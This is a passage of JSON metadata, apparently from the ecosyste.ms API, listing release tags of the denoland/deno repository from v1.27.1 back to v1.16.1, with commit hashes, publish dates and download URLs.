osyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep